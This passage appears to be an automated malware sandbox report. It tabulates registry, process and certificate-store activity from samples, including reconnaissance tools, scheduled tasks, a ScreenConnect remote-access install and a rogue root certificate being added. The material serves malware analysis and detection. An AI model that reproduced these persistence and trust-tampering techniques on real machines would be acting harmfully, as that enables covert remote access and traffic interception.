| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000f914d34881601a250000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000f914d3480000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900f914d348000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1df914d348000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000f914d34800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe | N/A |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\PackageCode = "84F03508698966EF2ABADC1907673931" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\PackageName = "setup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1045960512-3948844814-3059691613-1000\{020CC76E-28AB-4434-8B9F-D648DCEE2007} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-c13606fe9009f11d | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-c13606fe9009f11d\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\84F03508698966EF2ABADC1907673931\Full | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\c13606fe9009f11d\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\84F03508698966EF2ABADC1907673931 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1\84F03508698966EF2ABADC1907673931 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\ProductName = "ScreenConnect Client (c13606fe9009f11d)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Version = "402784261" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\c13606fe9009f11d\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\Files\file.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\ = "ScreenConnect Client (c13606fe9009f11d) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\ProductIcon = "C:\\Windows\\Installer\\{80530F48-9896-FE66-A2AB-CD9170769313}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
